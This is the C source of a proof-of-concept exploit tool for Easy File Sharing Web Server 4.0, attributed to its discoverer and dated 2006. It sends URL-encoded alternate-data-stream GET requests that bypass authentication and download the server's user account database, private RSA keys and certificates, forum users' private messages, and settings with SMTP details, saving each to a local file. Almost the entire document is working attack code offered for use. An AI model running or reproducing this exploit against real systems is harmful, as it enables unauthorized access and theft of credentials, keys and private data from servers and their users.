/* =================================================================== 0-day Alternative File Stream Exploit for Easy File Share Server 4 =================================================================== Exploit allows malicious users to grab files from the server without being authenticated completely bypassing security. 0-day Easy File Sharing Web Server v4.0 Information Stealer Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com This tool demonstrates EFS Web Server's Vulnerability to Alternative Data Stream GET requests which allow unauthorized users to download server critical files. Discovered and Reported: 10-30-2006 Usage: exploit [port 80=default] [Method see below] --------PoC Methods:----- 1 = Gather all login username and passwords and email addresses.[Default] 2 = Gather Private RSA Key and Certificates for server. 3 = Gather Private Messages used by Forum Users on the server 4 = Gather Server Settings File and SMTP server info. */ #include #include #include /* Win32 API */ #include /* WinInet API */ int mthd; unsigned short httpport; char exploit[512], exploit2[512], exploit3[512], exploit4[512]; char logmsg[512]; char endmsg[512]; HINTERNET inet; /* WinInet Internet Handle */ FILE *file; void ExploitHTTP (HINTERNET inet, const char *host, const char *exp) { HINTERNET connection; /* Connection Handle */ HINTERNET request; /* Request Handle */ unsigned long flags; /* HttpOpenRequest Flags */ char buffer[BUFSIZ]; unsigned long len; printf("HOST: %s\n", host); printf("PORT: %i\n", httpport); if ((connection = InternetConnect(inet, host, httpport, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0)) == NULL) { printf("Failed to Connect...Exiting\n"); InternetCloseHandle(inet); fclose(file); exit(1); } flags = INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_RELOAD; strcat(exp, "%3A%3A%24%44%41%54%41"); request = HttpOpenRequest(connection, "GET", exp, "HTTP/1.0", NULL, NULL, flags, 0); if (request == NULL) { printf("HTTP Open Request failed....Exiting\n"); InternetCloseHandle(connection); InternetCloseHandle(inet); fclose(file); exit(1); } if (!HttpSendRequest(request, NULL, 0, NULL, 0)) { printf("HTTP Send Request failed....Exiting\n"); InternetCloseHandle(request); InternetCloseHandle(connection); InternetCloseHandle(inet); fclose(file); exit(1); } printf("Exploit Sent...Dumping HTTP Return Packet..."); sleep(1000); while (InternetReadFile(request, buffer, sizeof buffer, &len) && len > 0) { fwrite(buffer, len, 1, file); if (fwrite(buffer, len, 1, stdout) < 1) { printf("Error Outputting HTTP Return Packet\n"); } } InternetCloseHandle(request); InternetCloseHandle(connection); } int main (int argc, char *argv[]) { printf("\n=========================================================================\n"); printf("0-day Easy File Sharing Web Server v4.0 Information Stealer\n"); printf("Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com\n"); printf("This tool demonstrates EFS Web Server's Vulnerability to Alternative\n"); printf("Data Stream GET requests which allow unauthorized users to download server \n"); printf("critical files.\n"); printf("Discovered and Reported: 10-30-2006\n"); printf("\nUsage: %s [port 80=default] [Method see below]\n", argv[0]); printf("--------PoC Methods:-----\n"); printf("1 = Gather all login username and passwords and email addresses.[Default]\n"); printf("2 = Gather Private RSA Key and Certificates for server.\n"); printf("3 = Gather Private Messages used by Forum Users on the server\n"); printf("4 = Gather Server Settings File and SMTP server info.\n"); printf("============================================================================\n"); inet = InternetOpen("ESF Exp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); if (inet == NULL) { printf("Error accessing InternetOpen API - Exiting...\n"); exit(1); } if (argc < 2) { printf("Invalid # of arguments...Exiting\n"); exit(1); } if (atoi(argv[3]) > 4) { mthd = 1; } if (atoi(argv[3]) <= 0) { mthd = 1; } mthd = atoi(argv[3]); /* Set Up Exploits */ switch(mthd) { case 1: file = fopen("Accounts.txt","a+"); sprintf(exploit, "%s", "%75%73%65%72%2E%73%64%62"); sprintf(endmsg, "%s", "\n\n\nResults Dumped to Accounts.txt\n"); break; case 2: file = fopen("RSAKeys.txt", "a+"); sprintf(exploit, "%s", "%53%65%72%76%65%72%4B%65%79%2E%70%65%6D"); sprintf(endmsg, "%s", "\n\n\nResults Dumped to RSAKeys.txt\n"); break; case 3: file = fopen("Messages.txt", "a+"); sprintf(exploit, "%s", "%6D%73%67%31%2E%73%64%62"); sprintf(endmsg, "%s", "\n\n\nResults Dumped to Messages.txt\n"); break; case 4: file = fopen("Server.txt", "a+"); sprintf(exploit, "%s", "%6F%70%74%69%6F%6E%2E%69%6E%69"); sprintf(endmsg, "%s", "\n\n\nResults Dumped to Server.txt\n"); break; } sprintf(logmsg, "%s", argv[1]); sprintf(logmsg, "%s", "\r\n\r\n\r\n"); fwrite(logmsg, strlen(logmsg), 1, file); httpport = atoi(argv[2]); ExploitHTTP(inet, argv[1], exploit); if (mthd == 3) { printf("\n\n Sending 2nd Exploit...\n"); strcat(exploit2, "%6D%73%67%32%2E%73%64%62"); ExploitHTTP(inet, argv[1], exploit2); printf("\n\n Sending 3rd Exploit...\n"); strcat(exploit3, "%6D%73%67%33%2E%73%64%62"); ExploitHTTP(inet, argv[1], exploit3); printf("\n\n Sending final Exploit...\n"); strcat(exploit4, "%6D%73%67%34%2E%73%64%62"); ExploitHTTP(inet, argv[1], exploit4); } if (mthd == 2) { printf("\n\n Sending 2nd Exploit...\n"); strcat(exploit2, "%53%65%72%76%65%72%43%65%72%74%2E%70%65%6D"); ExploitHTTP(inet, argv[1], exploit2); printf("\n\n Sending final Exploit...\n"); strcat(exploit3, "%52%6F%6F%74%43%65%72%74%2E%70%65%6D"); ExploitHTTP(inet, argv[1], exploit3); } fclose(file); Sleep(500); InternetCloseHandle(inet); printf("\n\n===================================================\n"); printf("%s\n", endmsg); printf("Proof Of Concept Exploit by Greg Linares\n"); printf("Send Comments/Concerns/Questions/Etc to GLinares.code [at] gmail [dot] com\n"); return 0; }